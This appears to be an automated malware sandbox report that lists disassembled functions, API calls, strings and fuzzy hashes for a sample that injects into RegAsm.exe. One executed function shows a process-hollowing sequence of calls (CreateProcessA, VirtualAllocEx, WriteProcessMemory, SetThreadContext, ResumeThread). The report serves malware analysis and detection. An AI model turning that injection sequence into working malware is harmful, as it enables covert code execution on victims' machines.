Opcode ID: 0fa848a44c73a6aeeb21660fd2b14f5aaf999c273a66810f0e0171f36124b769
Instruction ID: 083d3c1e84ca2e980ab4dd45ca0d837cc41164b3fcfcb6a28aec5d987169874b
Opcode Fuzzy Hash: 0fa848a44c73a6aeeb21660fd2b14f5aaf999c273a66810f0e0171f36124b769
Instruction Fuzzy Hash: 2A019231600214AFCB15EB19C995E5E77B8EF88754F05409AE8019B3A1DFB0EE44CB60

Function 00404C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GdipCloneImage.GDIPLUS(?,00000000,?,?,?,000000FF), ref: 00404C4C
GdipAlloc.GDIPLUS(00000010,?,?,?,000000FF), ref: 00404C5B

Strings

`K@, xrefs: 00404C75

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: Gdip$AllocCloneImage
String ID: `K@
API String ID: 3021075589-3536307564
Opcode ID: 6e910720078c30621a47b6eca49d96a116425349966641e16d2adddba9b4a4fa
Instruction ID: 8747f557437175caeb58756454adc5b6b8cc0decca9fbbd4afccec21ee9e9ac9
Opcode Fuzzy Hash: 6e910720078c30621a47b6eca49d96a116425349966641e16d2adddba9b4a4fa
Instruction Fuzzy Hash: C0112DB1905749DFDB10CF98D904BAABBF8FB48720F10866AE829D37D0D7749900CB91

Function 00404CB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GdipDisposeImage.GDIPLUS(FFFFFFFF,?,?,?,0054C48D,000000FF), ref: 00404CDF
GdipFree.GDIPLUS(?,?,?,?,0054C48D,000000FF), ref: 00404CF1

Strings

`K@, xrefs: 00404CD9

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: Gdip$DisposeFreeImage
String ID: `K@
API String ID: 1950503971-3536307564
Opcode ID: 3316c4455565ac62ed6a26cea9d7150bfba2d0e3f41cbf1825aecc5a329bdf6e
Instruction ID: 7ba4187510c4fdb2f2599f15a6424d96657f10c150e71c31b65947a42bc49c9a
Opcode Fuzzy Hash: 3316c4455565ac62ed6a26cea9d7150bfba2d0e3f41cbf1825aecc5a329bdf6e
Instruction Fuzzy Hash: 7201F472A00614ABC720CF48ED01B99BBA8FB19B21F00472FFC11A37C0C7B919108BD5

Function 00407A90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00407ACC
___std_exception_destroy.LIBVCRUNTIME ref: 00407AE2

Strings

)@, xrefs: 00407AC2, 00407ADC

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: )@
API String ID: 4194217158-4120265097
Opcode ID: 4e27366b7ee9414ccda2c67cfda4bcfdb3fdf3af514108570fd53349a8007307
Instruction ID: 39a61349d826cdb48b27ae0f58ab52f56d337699a51a428b07672872488508ae
Opcode Fuzzy Hash: 4e27366b7ee9414ccda2c67cfda4bcfdb3fdf3af514108570fd53349a8007307
Instruction Fuzzy Hash: FE01A2B2C04744ABC711DF98CD0178DFFF8EB09715F10466BE814A3380E3B8660487A5

Function 00407C70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00407CAC
___std_exception_destroy.LIBVCRUNTIME ref: 00407CC2

Strings

)@, xrefs: 00407CA2, 00407CBC

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: )@
API String ID: 4194217158-4120265097
Opcode ID: 079a93b04a3ba3abc24d092d7dfe36bbc927c30a13c0741f13d75e3117604452
Instruction ID: b31235e20b660ddbb30c99c001b11998604f696d918c6d2dbba64f62e05318ed
Opcode Fuzzy Hash: 079a93b04a3ba3abc24d092d7dfe36bbc927c30a13c0741f13d75e3117604452
Instruction Fuzzy Hash: 3F0162B2C44748ABC711DF98DD01B89FFF8EB09715F10466BE814A3781E3B9AA0487A5

Function 00404B60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GdipDisposeImage.GDIPLUS(?,?,?,Function_0014BFE0,000000FF), ref: 00404B84
GdipFree.GDIPLUS(?,?,?,Function_0014BFE0,000000FF), ref: 00404B96

Strings

`K@, xrefs: 00404B7E

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: Gdip$DisposeFreeImage
String ID: `K@
API String ID: 1950503971-3536307564
Opcode ID: 62ee0daa599b9b00a0c4ce88fb3d390fe4e594f946ea023ffe489846956dd575
Instruction ID: bd97fcbd8bdc5b644a2ca526311264c36a05ae446e09af96bb23667ce14d71f1
Opcode Fuzzy Hash: 62ee0daa599b9b00a0c4ce88fb3d390fe4e594f946ea023ffe489846956dd575
Instruction Fuzzy Hash: ADF0F672A44654ABD3218F08DC02F95B7E8FB19B10F00466BFC01A3780D7BA68108AD9

Function 0044B52D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,-00000002,00000000,00000000,?,00000000,?,00000000,00000000,?,00455EA3,-00000002,00000000,?,00000000,?), ref: 0044B57F

Strings

`-@, xrefs: 0044B55B
XD, xrefs: 0044B53E

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: CompareString
String ID: XD$`-@
API String ID: 1825529933-2568546640
Opcode ID: d0df0ea43047c73f5029be752bfe14cefc264b458c3f39c7a470d4df90d53397
Instruction ID: e44343d96fe236ab9219cb5f9cc943518e3960d7194e1eed57cc779ab2011060
Opcode Fuzzy Hash: d0df0ea43047c73f5029be752bfe14cefc264b458c3f39c7a470d4df90d53397
Instruction Fuzzy Hash: CDF0B83200021ABBCF126F90EC08ADE3F26EB483A4F058011FA1825130C736C972AB95

Function 00407550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 0040758C
___std_exception_destroy.LIBVCRUNTIME ref: 004075A2

Strings

)@, xrefs: 00407582, 0040759C

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: )@
API String ID: 4194217158-4120265097
Opcode ID: c858c6ed78de8a3b5ee1cba1accddd2d2891f2392b50b006f97d08456e2954ad
Instruction ID: 78ccdeb9fbba2d16b6cd524d5c99d9dbf264c3e6aa85c375e1d072593ce1236d
Opcode Fuzzy Hash: c858c6ed78de8a3b5ee1cba1accddd2d2891f2392b50b006f97d08456e2954ad
Instruction Fuzzy Hash: 12F01DB2805748EFC721DF98D901789FFF8FB09728F50466AE865A3780E77466048BA5

Function 00407A20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00407A5C
___std_exception_destroy.LIBVCRUNTIME ref: 00407A72

Strings

)@, xrefs: 00407A52, 00407A6C

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: )@
API String ID: 4194217158-4120265097
Opcode ID: 9ee8fa866bcea9d2c14fc14309fcadf8facde4318e0e6bb098ed358a1a235593
Instruction ID: 96290d15a7b89a27e7413382239de33ac52fdad5c525fa7f0e86a9c1871ea130
Opcode Fuzzy Hash: 9ee8fa866bcea9d2c14fc14309fcadf8facde4318e0e6bb098ed358a1a235593
Instruction Fuzzy Hash: 68F012B1805744DFC711DF98C90178DFFF8FB05728F50466AE855A3780E7B5660487A5

Function 0044B7F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00000016,00000001,004389D2,00000001,00000016,00438BE1,?,?,?,?,?,00000000), ref: 0044B834

Strings

InitializeCriticalSectionEx, xrefs: 0044B804
`-@, xrefs: 0044B824

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx$`-@
API String ID: 2593887523-3269949891
Opcode ID: 1f2253b5c78e33ee57fe7f30907939316c5faef6f9275bf3e632fad4f43c2f0e
Instruction ID: 5bcc12c1b0658f8dc7434a33690804c70bb56e7eadbb0958c8ec10a8e9d05d13
Opcode Fuzzy Hash: 1f2253b5c78e33ee57fe7f30907939316c5faef6f9275bf3e632fad4f43c2f0e
Instruction Fuzzy Hash: BDE09236581318BBCB212F92DC06DAE7F25EB24BA2F048022FD1956161C7768821BBD9

Function 0044B5DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0044B612

Strings

FlsAlloc, xrefs: 0044B5EE
`-@, xrefs: 0044B608

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc$`-@
API String ID: 2773662609-4156633630
Opcode ID: cb3d3b1705c4ad86f1f38207f7089225cebdf7df6536ef5bae3d846ce8807c5c
Instruction ID: f97a85a86a778de88566526de1fe8fa57bb386988dde2a496b9568b12ff0cd72
Opcode Fuzzy Hash: cb3d3b1705c4ad86f1f38207f7089225cebdf7df6536ef5bae3d846ce8807c5c
Instruction Fuzzy Hash: DAE0CD3258031477961036916C16DAA7D14D750BA3F050033F904522619A95891066DF

Analysis Process: 8x9h3ctqkpfTu0sNF0X2.exePID: 7268, Parent PID: 7624COMMON

Executed Functions

Function 0086018D Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,008600FF,008600EF), ref: 008602FC
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0086030F
Wow64GetThreadContext.KERNEL32(00000118,00000000), ref: 0086032D
ReadProcessMemory.KERNELBASE(0000011C,?,00860143,00000004,00000000), ref: 00860351
VirtualAllocEx.KERNELBASE(0000011C,?,?,00003000,00000040), ref: 0086037C
WriteProcessMemory.KERNELBASE(0000011C,00000000,?,?,00000000,?), ref: 008603D4
WriteProcessMemory.KERNELBASE(0000011C,00400000,?,?,00000000,?,00000028), ref: 0086041F
WriteProcessMemory.KERNELBASE(0000011C,?,?,00000004,00000000), ref: 0086045D
Wow64SetThreadContext.KERNEL32(00000118,00870000), ref: 00860499
ResumeThread.KERNELBASE(00000118), ref: 008604A8

Strings

GetThreadContext, xrefs: 00860267
GetP, xrefs: 0086020F
VirtualAlloc, xrefs: 00860254
ress, xrefs: 00860217
ReadProcessMemory, xrefs: 0086027A
TerminateProcess, xrefs: 0086038B
VirtualAllocEx, xrefs: 0086028D
CreateProcessA, xrefs: 00860241
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 008602FB
Load, xrefs: 008601CB
WriteProcessMemory, xrefs: 008602A0
ResumeThread, xrefs: 008602C9
aryA, xrefs: 008601D3
SetThreadContext, xrefs: 008602B3

Memory Dump Source

Source File: 00000016.00000002.1884286211.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_860000_8x9h3ctqkpfTu0sNF0X2.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction ID: d19768ddd90cdf316373c686924ea67fe9fd7274dbbf6c8cc29763ab750b749c
Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction Fuzzy Hash: 55B1D67664028AAFDB60CF68CC80BDA77A5FF88714F158524EA0CEB341D774FA518B94

Function 00E57930 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 214
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,00E57BE0,00000000,00000000,00000000), ref: 00E57BCF
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,?,?,?,?,?,?,?,?,00E57C86), ref: 00E57BD8

Strings

Own head, xrefs: 00E57ABD
Earth, xrefs: 00E57AE3
C, xrefs: 00E57965

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleThreadWait
String ID: C$Earth$Own head
API String ID: 1891408510-3365287836
Opcode ID: 47b2dd54e5900bb7f52aa356dc2d6ffa0120686bceef18e6767e1e0cc672bd9f
Instruction ID: 3b274374e5529df1e2c0f6bf19341029c18aaf3958eedab87668b5a062cc6636
Opcode Fuzzy Hash: 47b2dd54e5900bb7f52aa356dc2d6ffa0120686bceef18e6767e1e0cc672bd9f
Instruction Fuzzy Hash: C17131719083405BDB00DF34AC89B6FBBD5AF84311F142E2DFCD5B6192E660AA9C87A1

Function 00E57025 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 421
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 00E5706A

Strings

Zatlat, xrefs: 00E57630
0, xrefs: 00E57794

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: CurrentThread
String ID: 0$Zatlat
API String ID: 2882836952-1547964091
Opcode ID: be4d051fd157c4a7227582afbbaebd4eb1c5103b53e215612f0e957fc2501def
Instruction ID: 1171c3a3f03656207a17494b339bb4615a8aaa706544b5db9cf3be6e6217850c
Opcode Fuzzy Hash: be4d051fd157c4a7227582afbbaebd4eb1c5103b53e215612f0e957fc2501def
Instruction Fuzzy Hash: 82F1DD7150C3019FC314CF24E880A6AFBE6AF85311F246E1DF9E6AB251D730E958CB92

Function 00E48A55 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00E48B62,?,?,00000001,00000000,?,?,00E48DCC,00000021,FlsSetValue,00E5C5BC,00E5C5C4,00000001), ref: 00E48B16

Strings

api-ms-, xrefs: 00E48AAC
ext-ms-, xrefs: 00E48AC0

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: e7673e9187d350307d0f2f2b305e397c2eee13ed450665fadd7affb6bc8a831e
Instruction ID: 27db859a38c1f8f4cad257cf9c00b7a8ab7d4c0a7c5a327aa894b8c967de9ae0
Opcode Fuzzy Hash: e7673e9187d350307d0f2f2b305e397c2eee13ed450665fadd7affb6bc8a831e
Instruction Fuzzy Hash: E9215431A00310AFCB219B29BD84A6F37A8EB41765F251612FA05B72C1DFB0ED08C6E0

Function 00E575D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 245
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OffsetRect.USER32(00000000,00000000,00000000), ref: 00E576F6
Polyline.GDI32(00000000,00000000,00000000), ref: 00E57713

Strings

Zatlat, xrefs: 00E57630
0, xrefs: 00E57794

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: OffsetPolylineRect
String ID: 0$Zatlat
API String ID: 1418762327-1547964091
Opcode ID: fc2a0681dad2c5d747e276271e54dd64660258d7a37994454f13089ae205f670
Instruction ID: 89cbfb72e178d41926271bc64a17d38f2f88db9e9a7aa64f246dae817b9f2299
Opcode Fuzzy Hash: fc2a0681dad2c5d747e276271e54dd64660258d7a37994454f13089ae205f670
Instruction Fuzzy Hash: 3591CE715083809FE3149F28D88976FBBE0AFC5319F141A6CF9D4AB2A2C7B5D548CB52

Function 00E4023A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00E62420,0000000C), ref: 00E4024D
ExitThread.KERNEL32 ref: 00E40254

Strings

vn, xrefs: 00E4028A

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: ErrorExitLastThread
String ID: vn
API String ID: 1611280651-528124057
Opcode ID: fc65008a317640bb13b788dfeeb39d09b2c3cf3884eb6dcdfecd092c36971f50
Instruction ID: 0b4624bbb0cd5c3929c51a70d1d2a0049f56d72d4e1d9be3acceaf279e9e1225
Opcode Fuzzy Hash: fc65008a317640bb13b788dfeeb39d09b2c3cf3884eb6dcdfecd092c36971f50
Instruction Fuzzy Hash: C9F0CD70A40704AFDB05AFB2E90AA6E7BB4EF44711F201459F101BB2A2CF746945DBA1

Function 00E40396 Relevance: 4.6, APIs: 3, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?,Function_0001023A,00000000,?,?), ref: 00E403DF
GetLastError.KERNEL32 ref: 00E403EB
__dosmaperr.LIBCMT ref: 00E403F2

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 94517eac711e1bd626eabd46fa8cd1051dde2852d64b14b06649070922c66dcb
Instruction ID: 9daa68a089f8588ed190e5daf776ed6a8d48e173a3ba6d90edda79d352f1ab76
Opcode Fuzzy Hash: 94517eac711e1bd626eabd46fa8cd1051dde2852d64b14b06649070922c66dcb
Instruction Fuzzy Hash: 70015E72600219EFDF15AFA1EC06ADE7BA4EF00365F005068FA11B61A0DB71DE50DBA0

Function 00E4745C Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,00E4EEF0,?,00000000,?,?,00E4F191,?,00000007,?,?,00E4F68A,?,?), ref: 00E47472
GetLastError.KERNEL32(?,?,00E4EEF0,?,00000000,?,?,00E4F191,?,00000007,?,?,00E4F68A,?,?), ref: 00E4747D

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 5ce219b976541d0fa3b63d5d13a085b616060bd8d3c1e8a43a7c8d4923bb8146
Instruction ID: 5f31e606e9296e9ffe1e336380e4a233ba0909178dbcaad2eedea58cd67e97fc
Opcode Fuzzy Hash: 5ce219b976541d0fa3b63d5d13a085b616060bd8d3c1e8a43a7c8d4923bb8146
Instruction Fuzzy Hash: 1AE04F31204304ABDF252BE5FD097963A989B00355F0040A1F60CB60A1DB34888486D4

Function 00E48B20 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49812d54ffd0eed6777be850f21a9798f43b518bda784449b00f6dbc1e92bfbd
Instruction ID: 61b5b9d7a9324f619fbbd92f14ba470d10007243c61333da8894e5db8e97d0b0
Opcode Fuzzy Hash: 49812d54ffd0eed6777be850f21a9798f43b518bda784449b00f6dbc1e92bfbd
Instruction Fuzzy Hash: B701B57B7142115F9B168E6AFD4195E33D6FBC5334B249226F904FB298EE309C058750

Function 00E57BE0 Relevance: 1.4, APIs: 1, Instructions: 107
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040), ref: 00E57C76

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9a3ee5bf914304d8efbbcf0805198a81df51edc0e049972bf726ddabf2d82ae8
Instruction ID: 618b0101695f9f6639ab358ee367c270f82d27da0ae7408b36d215fc0288a698
Opcode Fuzzy Hash: 9a3ee5bf914304d8efbbcf0805198a81df51edc0e049972bf726ddabf2d82ae8
Instruction Fuzzy Hash: 8D31C071E043089BDB04DFA8EC86BEEB7F4AB0D301F101559ED44B7282EB759A588764

Non-executed Functions

Function 00E5069B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00E509B9,00000002,00000000,?,?,?,00E509B9,?,00000000), ref: 00E50734
GetLocaleInfoW.KERNEL32(?,20001004,00E509B9,00000002,00000000,?,?,?,00E509B9,?,00000000), ref: 00E5075D
GetACP.KERNEL32(?,?,00E509B9,?,00000000), ref: 00E50772

Strings

OCP, xrefs: 00E506EF
ACP, xrefs: 00E506B9

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
